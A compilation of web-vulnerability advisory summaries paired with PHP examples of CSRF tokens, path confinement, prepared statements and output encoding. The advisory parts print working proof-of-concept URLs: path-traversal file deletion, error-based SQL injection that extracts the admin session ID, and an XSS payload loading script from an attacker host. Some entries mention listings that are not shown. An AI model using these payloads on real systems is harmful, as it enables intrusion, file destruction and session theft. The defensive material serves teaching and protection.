An attacker can inject malicious SQL queries into the vulnerable parameter 'subid' of the 'showtest.php' script, which can be used to access or modify the database.
When an admin clicks on a malicious link, an attacker can log in as a new Administrator with the credentials detailed below.
A vulnerability exists in Sun Secure Global Desktop & Oracle Global Desktop due to improper validation of user-supplied input in the 'modules.cgi' script, which does not sanitize the 'module' parameter. An attacker can exploit this by sending a specially crafted HTTP request containing shell metacharacters to the vulnerable script, allowing arbitrary commands to be executed on the vulnerable system with the privileges of the web server.
Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS. The command injection attack works by sending a malicious URL to an authenticated user (let's say the admin). If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
This exploit allows an attacker to add an admin user to the Dream Gallery application. The attacker can craft a malicious HTML page with a form that submits a POST request to the usuario.php page with the action parameter set to 'incluir'. The form includes the parameters user_login, user_password, and user_email, which are used to create the admin user. When a victim visits the malicious page, the form is automatically submitted and the admin user is created.
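The two entries above (the "click a malicious link, gain an Administrator" case and the Dream Gallery 'incluir' form) are both cross-site request forgery against an account-creation endpoint. The following is an added example, not Dream Gallery's or any other project's code, of how such an endpoint is normally protected: a per-session random token that the forged form cannot know, checked in constant time, plus a SameSite session cookie as a second layer. The names csrf_token(), csrf_check(), render_form() and handle_incluir() are illustrative, and create_user() is an assumed application function.

```php
<?php
// Added example: CSRF protection for an admin-creation form.
// create_user() is a hypothetical application function; all other names are
// illustrative and not taken from Dream Gallery.

// Defense in depth: a SameSite cookie is not sent on cross-site POSTs from a
// foreign page, so the auto-submitted form in the advisory arrives without a
// session even before the token check runs (PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one random token per session and embed it in the legitimate form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The legitimate form carries the token as a hidden field.
function render_form(): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="usuario.php?action=incluir">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="user_login"><input name="user_password" type="password">'
         . '<input name="user_email"><button>Create</button></form>';
}

// Compare the submitted token against the session token in constant time.
function csrf_check(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Only an authenticated administrator presenting a valid token may create an
// account. A forged form from another origin has no token, so it stops here.
function handle_incluir(array $post, bool $is_admin): void {
    if (!$is_admin || !csrf_check($post)) {
        http_response_code(403);
        exit('Forbidden');
    }
    create_user((string) $post['user_login'], (string) $post['user_password'],
                (string) $post['user_email']);
}
```

The token check is what closes the hole; the SameSite attribute only limits which cross-site requests carry the cookie at all, and should not be relied on alone.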
It is possible to remotely delete arbitrary files on the web server of WordPress blogs that have the simple-backup plugin installed and enabled. No authentication is required, and the default configuration of simple-backup is affected.

Example 1: delete 'pizza.txt' in the WordPress root:
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt

Example 2: delete the .htaccess file protecting the backup folder:
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting

Note: when the 'download_backup_file' parameter is provided with an invalid file path, the PHP script exits prematurely with the message 'Access Denied!' and so does not automatically regenerate the .htaccess file. After this request, it may be possible (depending on the web server configuration) to browse the backup directory and download server backup files at this URL:
http://127.0.0.1/<WP-path>/simple-backup/

The backup archive files may contain all the WordPress files: configuration files (wp-config.php etc.), PHP source code, etc.
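The simple-backup entry combines a missing authorization check with a path traversal through 'delete_backup_file'. The block below is an added example, not the plugin's code, of how a WordPress admin-page handler can close both: it requires the manage_options capability and a nonce (the real WordPress functions current_user_can(), check_admin_referer() and wp_die() are used), and it confines the requested name to the backup directory with a strict file-name pattern followed by a realpath() containment check, which also rejects dot-files such as .htaccess. The variable $backup_dir and the function name safe_backup_path() are assumptions.

```php
<?php
// Added example: confining a user-supplied backup name to the backup directory.
// $backup_dir is assumed to be the plugin's backup folder; safe_backup_path()
// is an illustrative name, not a function of the simple-backup plugin.

function safe_backup_path(string $backup_dir, string $name): ?string {
    // Allow only a bare archive name: no slashes, no '..', no NUL bytes and no
    // leading dot, so '.htaccess' and '../pizza.txt' are both rejected here.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(zip|tar\.gz|sql)\z/', $name)) {
        return null;
    }
    $root = realpath($backup_dir);
    $path = realpath($backup_dir . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks and '..'; the result must exist, be a
    // regular file, and still lie strictly under the backup root.
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Handler as it would sit in the tools.php page callback.
if (isset($_GET['delete_backup_file'])) {
    // Authorization first: an administrator, with a valid nonce for this action.
    if (!current_user_can('manage_options')) {
        wp_die('Access denied');
    }
    check_admin_referer('simple_backup_delete');   // dies on a bad/missing nonce

    $target = safe_backup_path($backup_dir, (string) $_GET['delete_backup_file']);
    if ($target === null) {
        wp_die('Invalid backup file name');
    }
    unlink($target);
}
```

Two details matter for the second example in the advisory: the containment check runs regardless of whether a 'download_backup_file' parameter was also supplied, and the .htaccess that protects the folder is never a deletable name in the first place.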
For each new connection, websockify forks and calls the function do_handshake() to receive a client's WebSocket handshake. The following excerpt shows some of the source code responsible for receiving the client's data from the socket file descriptor: The function ws_recv() reads data from the socket file descriptor into the buffer handshake. The loop reads up to 4096 bytes of data from the socket and stores it in the buffer. The loop is limited to 10 iterations, which means that up to 40960 bytes of data can be read from the socket. The buffer is not checked for size before the data is written to it. This can be used to trigger a buffer overflow.
A vulnerability within the Relay Ajax Directory Manager web application allows unauthenticated attackers to upload arbitrary files to the web server running the application. While the application itself is mostly written in PHP, it also uses the Perl script 'upload.pl' to handle uploads initiated by the user. Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the web application. This request is sent to the Perl script, which handles the following steps.
2. A temporary file containing the entire request (including headers) is created. This temporary file is named partly by the first URL parameter, as shown in the following listing.
3. The headers and the POST body of the request are parsed and filtered to determine the final filename.
4. The upload is written to the final destination.
5. A file containing statistics about the upload process is written to the same directory.
Liferay is vulnerable to a stored XSS when a user is created with a malicious payload in the FirstName field. The JavaScript payload is executed when another user uses the profile search section.
PoC URLs for SQL injection. To determine the database, user and version:
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

To steal the admin's session ID (if the admin is not online, the page responds with the 'attack detected' string; if online, it responds with the admin's session ID):
http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON %23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1

PoC URL for XSS. Add a new admin to the website silently while the admin is checking the SecurityCheck logs:
http://website/index.php?option=<script>var script = document.createElement('script');script.src = "http://ATTACKER/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script>

attack.js: https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
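Both the 'subid' entry at the top of this list and the 'option' PoCs above arise from the same root cause: a request parameter is spliced into SQL text, and the ExtractValue() payloads work because the resulting MySQL error message is echoed back to the client. The stored and reflected XSS entries (Liferay's FirstName, the 'option' script tag) share a second root cause, unencoded output. The block below is an added example, not the code of any application named on this page, showing the vulnerable pattern next to three fixes: a PDO prepared statement with native (non-emulated) prepares, an allow-list for parameters that select a component rather than carry data, and HTML output encoding. The $pdo connection, the table and column names, the component list and the function names are all assumptions.

```php
<?php
// Added example: injection-prone query beside its fixed forms.
// $pdo is an assumed, already-configured PDO connection; 'tests'/'subid' and
// the component names are placeholders, not identifiers from the advisories.

// Vulnerable pattern: the parameter is part of the SQL string, so a value such
// as ' OR ExtractValue(...) rewrites the statement. Echoing the resulting
// database error to the user is what turns this into the error-based oracle
// seen in the 'option' PoCs.
function find_test_unsafe(PDO $pdo, string $subid): array {
    $sql = "SELECT id, title FROM tests WHERE subid = '" . $subid . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed pattern: the value is bound separately from the SQL text, so it can
// only ever be compared as data. Emulated prepares are disabled so the MySQL
// server itself receives the placeholder, and errors become exceptions that
// the caller logs rather than prints.
function find_test_safe(PDO $pdo, string $subid): array {
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $stmt = $pdo->prepare('SELECT id, title FROM tests WHERE subid = :subid');
    $stmt->execute([':subid' => $subid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A parameter like 'option' selects a component from a known set; it should be
// matched against an allow-list, never interpolated into SQL or HTML at all.
function normalise_option(string $option): ?string {
    $allowed = ['com_content', 'com_users', 'com_search'];   // assumed list
    return in_array($option, $allowed, true) ? $option : null;
}

// Any user-controlled value that reaches an HTML page (a reflected 'option',
// a stored FirstName) is encoded for the HTML context it lands in.
function html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Request handling tying the pieces together.
function handle_request(PDO $pdo, array $get): string {
    $option = normalise_option((string) ($get['option'] ?? ''));
    if ($option === null) {
        http_response_code(400);
        return 'Unknown component';            // the raw value is never echoed
    }
    try {
        $rows = find_test_safe($pdo, (string) ($get['subid'] ?? ''));
    } catch (PDOException $e) {
        error_log($e->getMessage());           // detail goes to the log only
        http_response_code(500);
        return 'Database error';
    }
    $out = '<h1>' . html($option) . '</h1><ul>';
    foreach ($rows as $row) {
        $out .= '<li>' . html($row['title']) . '</li>';
    }
    return $out . '</ul>';
}
```

On the detection side, the PoC strings above are easy to spot in web server logs: an 'option' or 'subid' value containing a quote followed by ExtractValue(, concat( or 0x3a, or a value containing <script, is a reliable signature for this family of attempts against an unpatched instance.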